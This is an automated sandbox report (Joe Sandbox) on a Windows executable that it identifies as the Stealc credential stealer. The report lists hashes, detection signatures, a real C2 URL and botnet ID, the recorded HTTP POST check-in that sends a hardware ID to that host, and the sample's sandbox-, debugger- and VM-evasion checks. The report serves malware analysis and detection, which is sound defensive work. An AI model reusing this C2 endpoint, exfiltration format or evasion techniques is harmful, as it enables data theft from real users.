Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1529189
MD5:f7b1143886156d2a48fcda8f5dec586e
SHA1:d0f524caa5ff55008c62c71fe8bf47e5c9cb12b2
SHA256:2b2dba893754d1e80e4fd6520017a706679796376cddcb37a09552e170e4ce21
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7056 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F7B1143886156D2A48FCDA8F5DEC586E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1358788116.0000000004E60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7056JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7056JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.be0000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-08T18:26:14.098409+020020442431Malware Command and Control Activity Detected192.168.2.749715185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.be0000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00BEC820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00BE9AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00BE7240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE9B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00BE9B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00BF8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00BF38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BF4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BEDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BEE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BEED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00BF4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BEF6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00BF3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BE16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BEDE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BEBE70

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49715 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 38 32 34 45 36 34 39 34 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="hwid"77824E6494FB4109353171------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="build"doma------CGDGCFBAEGDHJKEBGCBA--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00BE4880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGCFBAEGDHJKEBGCBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 37 38 32 34 45 36 34 39 34 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 43 46 42 41 45 47 44 48 4a 4b 45 42 47 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="hwid"77824E6494FB4109353171------CGDGCFBAEGDHJKEBGCBAContent-Disposition: form-data; name="build"doma------CGDGCFBAEGDHJKEBGCBA--
                Source: file.exe, 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/M
                Source: file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpWindows
                Source: file.exe, 00000000.00000002.1399229578.0000000000A1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpZ
                Source: file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpc
                Source: file.exe, 00000000.00000002.1399229578.00000000009FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1399229578.000000000099E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37s

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C10_2_00FB88C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F330B50_2_00F330B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F5B0A10_2_00F5B0A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAB0610_2_00FAB061
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE51600_2_00EE5160
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E4F9530_2_00E4F953
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E721280_2_00E72128
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FAE2A40_2_00FAE2A4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB32400_2_00FB3240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB6BC60_2_00FB6BC6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE244F0_2_00EE244F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE844F0_2_00EE844F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF1C470_2_00EF1C47
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECA54B0_2_00ECA54B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB17A90_2_00FB17A9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E8EF210_2_00E8EF21
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00BE45C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: uwwmduoa ZLIB complexity 0.9947200123856708
                Source: file.exe, 00000000.00000003.1358788116.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00BF8680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00BF3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\J1TU0JXR.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1835520 > 1048576
                Source: file.exeStatic PE information: Raw size of uwwmduoa is bigger than: 0x100000 < 0x19a000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.be0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;uwwmduoa:EW;roqxtsuu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;uwwmduoa:EW;roqxtsuu:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BF9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cd38a should be: 0x1ca6aa
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: uwwmduoa
                Source: file.exeStatic PE information: section name: roqxtsuu
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0104F91D push 304A7641h; mov dword ptr [esp], ebp0_2_0104F939
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push 2745F180h; mov dword ptr [esp], edx0_2_00FB88D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push ebx; mov dword ptr [esp], ecx0_2_00FB890A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push eax; mov dword ptr [esp], edi0_2_00FB8926
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push 3167293Eh; mov dword ptr [esp], edi0_2_00FB8936
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push ecx; mov dword ptr [esp], eax0_2_00FB8980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push 2BFE7D55h; mov dword ptr [esp], edx0_2_00FB8A32
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push 31E54D54h; mov dword ptr [esp], edi0_2_00FB8A7E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push 03052DDAh; mov dword ptr [esp], edx0_2_00FB8A9C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push ecx; mov dword ptr [esp], edi0_2_00FB8AC3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push 7A69479Eh; mov dword ptr [esp], ebx0_2_00FB8AD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push eax; mov dword ptr [esp], ebp0_2_00FB8ADD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push 09274CB2h; mov dword ptr [esp], eax0_2_00FB8B1B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push ebx; mov dword ptr [esp], eax0_2_00FB8B5B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push eax; mov dword ptr [esp], 5BB97D04h0_2_00FB8B5F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push 3E4E5128h; mov dword ptr [esp], esp0_2_00FB8BA4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push ebx; mov dword ptr [esp], eax0_2_00FB8C6E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push ecx; mov dword ptr [esp], 38368FE0h0_2_00FB8C72
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push esi; mov dword ptr [esp], ebp0_2_00FB8CEE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push eax; mov dword ptr [esp], esi0_2_00FB8D06
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push 68EA52D2h; mov dword ptr [esp], edx0_2_00FB8D94
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push ecx; mov dword ptr [esp], 61953C7Fh0_2_00FB8D9B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push esi; mov dword ptr [esp], ebx0_2_00FB8DCD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push 2645FD33h; mov dword ptr [esp], edi0_2_00FB8E33
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push ebx; mov dword ptr [esp], 7ECF1CC4h0_2_00FB8E4A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push edi; mov dword ptr [esp], eax0_2_00FB8E8A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push edi; mov dword ptr [esp], edx0_2_00FB8F15
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push edi; mov dword ptr [esp], eax0_2_00FB8FAF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push ecx; mov dword ptr [esp], eax0_2_00FB8FB3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push 6E89007Ch; mov dword ptr [esp], edx0_2_00FB9050
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FB88C1 push edx; mov dword ptr [esp], eax0_2_00FB90CE
                Source: file.exeStatic PE information: section name: uwwmduoa entropy: 7.952745504093785

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BF9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13640
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADDE0 second address: FADDFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533114h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADDFA second address: FADE09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67208644CBh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD165 second address: FBD189 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F6720533114h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F6720533106h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD189 second address: FBD18D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD18D second address: FBD197 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6720533106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD31C second address: FBD320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD320 second address: FBD336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6720533110h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD91E second address: FBD93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F67208644D6h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD93E second address: FBD95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007F6720533116h 0x0000000b popad 0x0000000c rdtsc
